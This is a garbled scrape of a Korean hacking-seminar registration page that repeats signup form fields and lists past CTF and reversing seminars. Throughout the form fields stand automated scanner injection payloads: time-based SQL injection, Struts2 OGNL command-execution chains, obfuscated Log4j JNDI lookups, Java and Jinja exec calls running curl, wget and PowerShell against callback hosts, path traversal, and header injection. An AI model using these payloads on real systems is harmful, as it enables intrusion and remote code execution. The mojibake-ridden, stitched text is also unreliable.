ȸ

ǥ

¥

û

ڼ

û

C Ư

DoTri

2013-01-19, 20
14~18
(ϰ)

10

:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'= 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)- 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); - 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
;SELECT sleep( 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_22 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
+ (SELECT 0 FROM (SELECT SLEEP(29))qsqli 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
',0,0);WAITFOR DELAY'00:00 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
');WAITFOR DELAY '00:00 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
';WAITFOR DELAY '00:00 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
);WAITFOR DELAY '00:00 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
;WAITFOR DELAY '00: 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
WAITFOR DELAY '00 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
1 o 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
1 o 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' and 'tpklq' 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' or 'tpklq' 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
') and 'swqtp' 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
') or 'swqtp' 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
and 7248 I 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
and NULL I 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
or 6248 I 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
or NULL I 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
and 4325=2 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
or 4325=4 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' and 3789=1 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
' or 3789=3 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
') and 2634=1 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
') or 2634=2 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : ().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","6e6d1e29bb1f5da2136235ce2de9fbc13154c390.13471884250407416.3203938778.oscomm15079701.oscomm.eu2.qua lateReference__context.cycler.__init__.__globals__.os.popen('wget http://62eea3b6d8539b957aa6b529f238e0c6488dfb46.13471884250407416.2169245440.oscomm15019101.oscomm.eu2.qualysperisc script:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://824cda584c7810dfee9a0b672d3983e45060b39e.13471884250407416.4067625982.oscomm27.oscomm.eu2.qua script:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://2d0e3a2a2538f46e077c834feb2edc7f61c16429.13471884250407416.3868944478.oscomm26.oscomm.eu2.qua https://c622dda33e2f40c99076d7b3d8e5538d45649cd3.13471884250407416.1758269475.oscomm25.oscomm.eu2.qu http://ecf67981ebae3bca27ca97433d26c2051d45c61e.13471884250407416.3071452179.oscomm24.oscomm.eu2.q ttps://509ec472dd2497e5335b804adde7fba78e5895df.13471884250407416.1707461101.oscomm23.oscomm.eu2.q ttp://80605e57173dc22aa360816fd505933a261b1949.13471884250407416.3095585731.oscomm22.oscomm.eu2.q |9a8a9ccd642eba4d182d45ff8f6ac1d7d9bfbc53.13471884250407416.2225579674.oscomm21.oscomm.eu2.q script:java.lang.Runtime.getRuntime().exec('curl http://d6c000a0349432b6df118eddec3e0c4524ff8adb.13471884250407416.3347602993.oscomm20.oscomm.eu2.qua ttps://3c2a1392cb6b3f25d59cfcc0a6a4b1824e2f1a71.13471884250407416.2573441437.oscomm19.oscomm.eu2.qu ttp://041f6bd4963de2e679cb2867065650c09a3dc6c1.13471884250407416.4090887078.oscomm18.oscomm.eu2.qu https://4f4b7944b0c1a9c6c0dc8d858044d9b97f1f947f.13471884250407416.1110747986.oscomm17.oscomm.eu2.qu https://ed51b78a520e387cc960e02f7ccb738293771866.13471884250407416.3326772450.oscomm16.oscomm.eu2.qualysperis script:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm1 script:java.lang.Runtime.getRuntime().exec('curl https://49dde0753b7dbeb045ab000a2549c06014c5b2bf.13471884250407416.3122290163.oscomm14.oscomm.eu2.qua iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.osco script:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://93d32cebdf9c2fb2d21c1e551dedf94f053ce2c5.13471884250407416.3165272625.oscomm12.oscomm.eu2.qua iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.osco script:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://87d0db50adf9317fca511e0922f9b112b9e0fb80.13471884250407416.1489027337.oscomm10.oscomm.eu2.qua ttps://@CIPHER@.@UNIQUEID@.@URI@.oscom ttp://@CIPHER@.@UNIQUEID@.@URI@.oscom ttps://06226a5d2562fd408d08f90891f117987fc450a0.13471884250407416.3141272900.oscomm07.oscomm.eu2.q ttp://b04e1dff847709f1e84bdfcb63b1c43dcb321f57.13471884250407416.1126073660.oscomm06.oscomm.eu2.q |@CIPHER@.@UNIQUEID@.@URI@.oscom |10a9fd0ffa34002b508dc40a323003bb7d07c017.13471884250407416.4037423240.oscomm04.oscomm.eu2.q script:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm0 script:java.lang.Runtime.getRuntime().exec('curl http://6fa79838865c8b8449f587220f2d311dd98bab2a.13471884250407416.679679387.oscomm02.oscomm.eu2.qua {upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9df727c73b012215b70971242e7dad7166363fb5.13471884250407416.1934791482.log4j12.log4j.eu2.qualysperis :-o}${:-w}${:-e}${:-r}:n}di:ldap://24a073f7f48b861c9f88353fe2935a7c26b59def.13471884250407416.1957232271.log4j11.log4j.eu2.qualysperis ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//2062aa09fb7586807f66fd3b67be122435ede28a.13471884250407416.2851853730.log4j10.log4j.eu2.qualysperis f5111d28cceb40db2ebbf9309554395910ccf0d2.13471884250407416.3026090310.log4j09.log4j.eu2.qualysperis }${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7c7da239f1baf7cd61d110cfbe632efbf5b938da.13471884250407416.1643313902.log4j08.log4j.eu2.qualysperis ${123:-i:}}ldap://0160b80de384a212b7fe14e26b20008c85f60bd9.13471884250407416.498723884.log4j07.log4j.eu2.qualysperis ldap${::-:}//5e8d94c8aca39fb95a2fba0337168294163ce056.13471884250407416.1390143626.log4j06.log4j.eu2.qualysperis -n}${::-d}${::-i}:${::-r}${::-m}${::-i}://7e684c89586ad8e1659d585cdd0165ef86e96337.13471884250407416.279117556.log4j05.log4j.eu2.qualysperis r:l}${lower:d}${lower:a}${lower:p}://7cef3c739499dd14a02fda09d70402b30141ddc2.13471884250407416.750682134.log4j04.log4j.eu2.qualysperis e96451c9cfa9c4bb3b6f62f5d39efe55ea8f262a.13471884250407416.1950106368.log4j03.log4j.eu2.qualysperis /a56fe1798ba438209019a9803828ae4bc7c8e9a6.13471884250407416.1928639461.log4j02.log4j.eu2.qualysperis 65fbf3a1b42b4c641bbe3a7ae08.13471884250407416.1983742985.ssrf02.ssrf.eu2. c15a0fb64a5c9ee07286332047a2d3ebfa.13471884250407416.470175420.ssrf01.ssrf.eu2. c:was_engine@941ae619b57497e3cb847824de0966b658e731ce.13471884250407416.1961599970.smtphi01.smtp.eu2.qualysperi 0 ().forName('java.lang.Runtime').getMeth 50898".toString().replace 4.169.2 *213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/ 759}${23.0231*213.759} br />=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : ction(){qxss 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : { ){ { ss(X13 OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process art/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r art/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r ...//....//.. read=string.rot13/ ./../../Windows/System3 ./../../Windows/System /....//....//....//... /..//../ 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : < 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : lys_resp_hdr_injection: Vulner ys_resp_hdr_injection ent-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
pt a=4>qssRl4GpVoz=7<
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : :
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
_q_q=random(jR 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : 커쿨 ID :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 :
:
직( or 직) :
거주지 :
딝 :
블로 :
락() :
곋은 말 :
불 계좌 : ss(X13 />•댁빱Šㅼ엥 ID :
‚˜ :
吏—…(•™ƒ or 吏žμ) :
嫄곗<吏€ :
대” :
釉”濡œ洹 :
—곕쎌˜(•„ˆ˜) :
•˜怨‹띠€ 留 :
™˜遺ˆ ‹œ 怨„醫Œ :
해커스쿨 ID :
나이 :
직업(학생 or 직장인) :
거주지 :
이메일 :
블로그 :
연락처(필수) :
하고싶은 말 :
환불 시 계좌 :
해커스쿨 ID :
나이 :
직업(학생 or 직장인) :
거주지 :
이메일 :
블로그 :
연락처(필수) :
하고싶은 말 :
환불 시 계좌 :
��Ŀ���� ID :
���� :
���(�л� or ������) :
������ :
�̸��� :
��α� :
����ó(�ʼ�) :
�ϰ��� �� :
ȯ�� �� ���� :

xista ../../../../../../../../.. ./../../../../../../../.. ..\..\..\..\..\..\..\..\..\..\..\. ../../../../../../../../../../../. .\..\..\..\..\..\..\..\..\..\..\. ./../../../../../../../../../../. /> 해커스쿨 ID :
나이 :
직업(학생 or 직장인) :
거주지 :
이메일 :
블로그 :
연락처(필수) :
하고싶은 말 :
환불 시 계좌 :
845

POC

Ŭ


[ڼ]

ϵ ŷ
- AVR α׷ -

۸
codeache
M2rkat
letmein

2012-05-12
14~18

30

30

POC

Ŭ


[ڼ]

ϵ ŷ
- (2 ) -

codeache
blueh4g
۸
M2rkat
letmein

2011-11-12
14~18

30

30

POC

Ŭ


[ڼ]

ϵ ŷ
- -

codeache
blueh4g
۸
M2rkat
letmein

2011-10-03
14~18

20

17

POC

Ŭ


[ڼ]

2011 Codegate CTF Ǯ

codeache
blueh4g
۸
sjh21a
rootbug

2011-03-26
14~18

30

30

Ŀ
͵

Ŭ

2011 ĵ CTF + Ǯ

codeache
blueh4g
۸

2011-02-26
14~18

30

30

Ŀ
͵

Ŭ

BOF Ǯ (Redhat)

HEX0D,
۸

2010-10-09
14~17

30

30

POC

Ŭ

ȵ̵ hello world
ڵ ǽ

neighbor
۸

2010-08-14
14~17

30

30

POC

Ŭ

2010 DEFCON CTF  Ǯ

۸

2010-07-24
14~18

20

20

Ŀ
͵

Ŭ


û Դϴ. ο ä ̻ û Ͻ ϴ.

߸ û ڰ ϱ ο پ 쵵 ֽϴ.

û ̳ ֽϴ.




[ 1ȸ ̳ ]   [ 2ȸ ̳ ]   [ 3ȸ ̳ ]